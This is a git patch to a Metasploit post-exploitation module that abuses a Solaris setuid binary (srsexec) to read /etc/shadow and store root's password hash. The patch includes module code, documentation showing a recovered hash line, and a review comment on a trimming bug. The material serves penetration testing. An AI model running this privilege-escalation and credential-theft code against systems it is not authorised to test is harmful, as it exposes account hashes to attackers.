From ee0776b095bd46b203a3440f2f6c889d52eb18db Mon Sep 17 00:00:00 2001
From: h00die
Date: Thu, 20 Sep 2018 20:54:41 -0400
Subject: [PATCH] print when not verbose
---
 .../post/solaris/escalate/srsexec_readline.md | 17 +++++++++--------
 .../post/solaris/escalate/srsexec_readline.rb | 9 ++++++---
 2 files changed, 15 insertions(+), 11 deletions(-)
diff --git a/documentation/modules/post/solaris/escalate/srsexec_readline.md b/documentation/modules/post/solaris/escalate/srsexec_readline.md
index 34f85c3b49..c3741db5b0 100644
--- a/documentation/modules/post/solaris/escalate/srsexec_readline.md
+++ b/documentation/modules/post/solaris/escalate/srsexec_readline.md
@@ -42,21 +42,22 @@ msf5 post(solaris/escalate/srsexec_readline) > run
 [+] 3.2.4 is vulnerable
-[+] Output: verify_binary(wsltw)
-srsexec: binary_name: wsltw
-srsexec: name_buf: wsltw_______________
+[+] Raw Command Output: verify_binary(vFYZf)
+srsexec: binary_name: vFYZf
+srsexec: name_buf: vFYZf_______________
 binaries file line: root:MW7h.vpI1Kq1g:1
 binaries file line: :17599:::::: smmsp:NP
-Security verification failed for binary: wsltw
+Security verification failed for binary: vFYZf
 see SYSLOG(/var/adm/messages) for errors
-[+] Adding root's hash added to credential database.
+[+] First line of /etc/shadow: root:MW7h.vpI1Kq1g:17599::::::
+[+] Adding root's hash to the credential database.
 [*] Post module execution completed
 msf5 post(solaris/escalate/srsexec_readline) > creds
 Credentials
 ===========
-host origin service public private realm private_type
----- ------ ------- ------ ------- ----- ------------
- 1.1.1.1 root MW7h.vpI1Kq1g Nonreplayable hash
+host origin service public private realm private_type
+---- ------ ------- ------ ------- ----- ------------
+ 1.1.1.1 root MW7h.vpI1Kq1g Nonreplayable hash
 ```
diff --git a/modules/post/solaris/escalate/srsexec_readline.rb b/modules/post/solaris/escalate/srsexec_readline.rb
index e11bf176ee..7a6037f09b 100644
--- a/modules/post/solaris/escalate/srsexec_readline.rb
+++ b/modules/post/solaris/escalate/srsexec_readline.rb
@@ -76,8 +76,7 @@ class MetasploitModule < Msf::Post
 flag = Rex::Text.rand_text_alpha 5
 output = cmd_exec("#{suid_bin_path} -dvb #{datastore['FILE']} #{flag}")
- vprint_good("Output: #{output}")
- return unless datastore['FILE'] == '/etc/shadow'
+ vprint_good("Raw Command Output: #{output}")
 # The first line of the file is cut at 20 characters.
 # If the output is longer than 20 characters, then
@@ -85,10 +84,14 @@ class MetasploitModule < Msf::Post
 # followed by the next 18 characters.
 formatted_output = output.scan(/binaries file line: (.+)$/).flatten.map { |line|
- (line.length == 20) ? line[0..18] : line
+ (line.length == 20) ? line[0..17] : line
 }.join
 return if formatted_output.empty?
+
+ print_good("First line of #{datastore['FILE']}: #{formatted_output}")
+
+ return unless datastore['FILE'] == '/etc/shadow'
 print_good("Adding root's hash to the credential database.")
 credential_data = { origin_type: :session,
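Review bot: In the second hunk, `(line.length == 20) ? line[0..17] : line` trims two characters from every 20-character fragment, including the last one, where no later fragment repeats them. If the final captured fragment is exactly 20 characters long, the reassembled value would presumably lose its last two characters. Either trim only fragments that are followed by another one, or record the limitation in the comment above the `scan`, for example `# NOTE: a final fragment of exactly 20 characters is trimmed as well`. The added `print_good("First line of ...")` writes the recovered line at normal verbosity, so with `FILE` set to `/etc/shadow` the hash also reaches console output and any spool or log of the session; the module documentation should say so. The enclosing method starts before the first hunk and continues past `origin_type: :session,`.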